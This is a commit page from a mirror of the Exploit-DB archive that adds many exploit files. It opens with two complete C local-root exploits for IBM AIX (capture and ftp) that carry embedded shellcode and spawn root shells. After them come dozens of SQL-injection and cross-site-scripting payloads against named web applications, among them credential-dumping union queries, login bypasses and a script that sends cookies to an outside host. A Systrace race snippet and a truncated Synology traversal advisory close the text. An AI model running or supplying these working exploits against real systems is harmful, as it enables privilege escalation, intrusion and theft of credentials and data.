bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-04 23:27:58 +00:00
parent 1e0b592801
commit 30d9cc4c3d
450 changed files with 70352 additions and 21367 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9259
files.csv
View file

File diff suppressed because it is too large Load diff

186
platforms/aix/local/30399.c Executable file
View file

@ -0,0 +1,186 @@
source: http://www.securityfocus.com/bid/25075/info
IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions.
/* 07/2007: public release
*
* qaaz@aix:~$ ./aix-capture
* --------------------------------
* AIX capture Local Root Exploit
* By qaaz
* --------------------------------
* bash: no job control in this shell
* bash-3.00#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
ulong addr = get_addr(argv, envp, args, envs);
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}

168
platforms/aix/local/30400.c Executable file
View file

@ -0,0 +1,168 @@
source: http://www.securityfocus.com/bid/25077/info
The IBM AIX FTP application is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
A nonprivileged user may trigger this vulnerability to execute code with superuser privileges. Failed exploit attempts will likely result in a denial of service.
IBM AIX 5.2 and 5.3 are vulnerable.
/* 07/2007: public release
*
* qaaz@aix:~$ ./aix-ftp
* ----------------------------
* AIX ftp Local Root Exploit
* By qaaz
* ----------------------------
* bash: no job control in this shell
* bash-3.00#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}

9
platforms/asp/webapps/30296.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24894/info
activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Reports indicate that contentserver versions prior to 5.6.2964 are vulnerable to this issue.
https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--

9
platforms/asp/webapps/30297.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24895/info
activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Reports indicate that versions prior to contentserver 5.6.2964 are vulnerable to this issue.
http://www.example.com/errors/rights.asp?awReadAccessRight=True&msg=<script>alert('XSS')</script>

9
platforms/asp/webapps/30298.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24895/info
activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Reports indicate that versions prior to contentserver 5.6.2964 are vulnerable to this issue.
http://www.example.com/errors/transaction.asp?msg=<script>alert('XSS')</script>

9
platforms/asp/webapps/30300.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24909/info
MzK Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
http://www.example.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

32
platforms/asp/webapps/30313.txt Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/24923/info
TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
TBDev.NET DR 010306 and prior versions are vulnerable.
version 11-10-05-BETA-SF1:111005 <=
$avatar = $_POST["avatar"];
where
$_POST["avatar"]=javascript:alert(document.cookie);
or
$_POST["avatar"]="><script
src=http://urlmaliciousJavaScript></script><";
-> last version <= 010306
$_POST["avatar"]=javascript:alert(document.cookie);
go to
http://torrentvictim/userdetails.php?id=malicioususerprofileid
the souce code is:
...<tr><td class=rowhead>Avatar</td><td align=left><img src="\"><script
src=http://urlmaliciousJavaScript><script><\""></td></tr>...
or
...<tr><td class=rowhead>Avatar</td><td align=left><img
src="javascript:alert(document.cookie);"></td></tr>...

9
platforms/asp/webapps/30316.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24928/info
The 'husrevforum' program is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects husrevforum v 1.0.1 (tr); other versions may be affected as well.
http://www.example.com//script_path/philboard_forum.asp?forumid=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

22
platforms/asp/webapps/30327.html Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/25004/info
Dora Emlak Script is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, steal cookie-based authentication credentials, compromise the application, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dora Emlak Script v1.0 is vulnerable.
<html><head></head><body>1-http://www.example.com/dora/default.asp?goster=iletisim
You write xss code in page's text box
Adý <script>alert("G3");</script>
Soyadý<script>alert("G3");</script>
Mail Adresiniz <script>alert("G3");</script>
Konu <script>alert("G3");</script>
Mesajý <script>alert("G3");</script>
Press to "gör"(send) button.
http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL]
</body></html>

8
platforms/asp/webapps/30328.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/25005/info
Alisveris Sitesi Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/?menukat=2%20&mod=product&cat_id=7&product_id=[SQL]
http://www.example.com/?menukat=2%20&mod=product&cat_id=[SQL]

7
platforms/asp/webapps/30330.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25007/info
Alisveris Sitesi Scripti is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/?mod=search&type=simple&q=[XSS]

28
platforms/asp/webapps/30331.html Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/25008/info
Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Asp cvmatik 1.1 is vulnerable.
<html><head></head><body>1-http://www.example.com/cv.asp
You write xss code in page's text box
Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet <script>alert("G3");</script>
or
Askerlik <script>alert("G3");</script>
or
GSM <script>alert("G3");</script>
etc...
Press to "tamam"(ok) button.
2-next page
</body></html>

9
platforms/asp/webapps/30332.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25010/info
Image Racer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Image Racer 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/SearchResults.asp?SearchWord=[SQLCOMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

11
platforms/asp/webapps/30382.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/25055/info
W1L3D4 Philboard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
W1L3D4 Philboard 0.3 is vulnerable; other versions are also affected.
http://www.example.com/script_path/W1L3D4_aramasonuc.asp?searchterms=[XSS]

7
platforms/asp/webapps/30402.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25081/info
Nukedit is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

9
platforms/asp/webapps/30423.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25096/info
Metyus Forum Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Metyus Forum Portal 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users

11
platforms/asp/webapps/30424.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/25109/info
Berthanas Ziyaretci Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Berthanas Ziyaretci Defteri 2.0 is affected; other versions may also be vulnerable.
To demonstrate this issue, use the following string for both the username and password of the vulnerable script:
' OR '1'='1

9
platforms/asp/webapps/30425.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25112/info
Online Store Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script:
anything' OR 'x'='x

9
platforms/asp/webapps/30426.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25113/info
Message Board / Threaded Discussion Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script:
anything' OR 'x'='x

9
platforms/asp/webapps/30427.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25114/info
Pay Roll - Time Sheet and Punch Card Application With Web Interface is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script:
anything' OR 'x'='x

9
platforms/asp/webapps/30428.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25115/info
Real Estate Listing Website Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script:
anything' OR 'x'='x

9
platforms/asp/webapps/30446.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25185/info
Hunkaray Okul Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hunkaray Okul Portali 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin

7
platforms/asp/webapps/30451.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25195/info
Next Gen Portfolio Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/default.asp?ExecuteTheLogin=1&Users_Email=anything%27+OR+%27x%27%3D%27x&Users_Password=anything%27+OR+%27x%27%3D%27x

7
platforms/asp/webapps/30505.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25350/info
Text File Search Classic is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/samples/textfilesearch.asp?query=[xss]

23
platforms/asp/webapps/30541.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/25480/info
Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code in a user's browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof-of-concept URIs are available for the SQL-injection vulnerability:
To display the logged-in database user:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the selected database:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the UNIX time when a call was made from extension 12345:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the destination number for that call. Replace "1174900000" with the value from the previous query:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

9
platforms/asp/webapps/30545.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25492/info
Absolute Poll Manager XE is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Absolute Poll Manager XE 4.1; other versions may also be vulnerable.
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e&

11
platforms/asp/webapps/30564.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/25532/info
E-Smart Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The following proof of concept is available:
user: 'or''='
pass: 'or''='

10
platforms/asp/webapps/30571.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/25613/info
Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Proxy Anket 3.0.1; other versions may also be vulnerable.
http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin
http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin

7
platforms/asp/webapps/30621.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25828/info
Novus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/buscar.asp?p=[XSS]

7
platforms/asp/webapps/30624.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25875/info
Netkamp Emlak Scripti is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and an SQL-injection issue, because the application fails to sanitize user-supplied input.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com.com/script_path/detay.asp?ilan_id=[SQL]

9
platforms/asp/webapps/30625.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25880/info
Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ohesa Emlak Portal 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/satilik.asp?Kategori=[SQL]

9
platforms/asp/webapps/30626.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25880/info
Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ohesa Emlak Portal 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/detay.asp?Emlak=[SQL]

8
platforms/asp/webapps/30629.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/25884/info
ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin

18
platforms/bsd/local/30484.c Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/25258/info
Systrace is prone to multiple concurrency vulnerabilities due to its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel.
Attackers can exploit these issues by replacing certain values in system call wrappers with malicious data to elevate privileges or to bypass auditing. Successful attacks can completely compromise affected computers.
struct sockaddr_in *sa, restoresa;
/* Set up two addresses with INADDR_ANY. */
sa = fork_malloc(sizeof(*sa));
sa->sin_len = sizeof(*sa);
sa->sin_family = AF_INET;
sa->sin_addr.s_addr = INADDR_ANY;
sa->sin_port = htons(8888);
restoresa = *sa;
/* Create child to overwrite *sa after 500k cycles. */
pid = fork_and_overwrite_smp_afterwait(sa, &restoresa,
sizeof(restoresa), 500000);
error = bind(sock, sa, sizeof(*sa));

7
platforms/cgi/webapps/30440.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25148/info
WebEvent is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

80
platforms/cgi/webapps/30475.txt Executable file
View file

@ -0,0 +1,80 @@
**************************************************************
Title: Synology DSM multiple directory traversal
Version affected: <= 4.3-3810
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: patched
CVE: 2013-6987
**************************************************************
I'm again here with a Synology DSM vulnerability.
Synology DiskStation Manager (DSM) it's a Linux based operating
system, used for the DiskStation and RackStation products.
I found a lot of directory traversal in the FileBrowser components.
This kind of vulnerability allows any authenticated user, even if not
administrative, to access, create, delete, modify system and
configuration files.
The only countermeasure implemented against this vulnerability is the
check that the path starts with a valid shared folder, so is enough to
put the "../" straight after, to bypass the security check.
Vulnerables CGIs:
- /webapi/FileStation/html5_upload.cgi
- /webapi/FileStation/file_delete.cgi
- /webapi/FileStation/file_download.cgi
- /webapi/FileStation/file_sharing.cgi
- /webapi/FileStation/file_share.cgi
- /webapi/FileStation/file_MVCP.cgi
- /webapi/FileStation/file_rename.cgi
Not tested all the CGI, but I guess that many others are vulnerable,
so don't take my list as comprehensive.
Following some examples ("test" is a valid folder name):
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
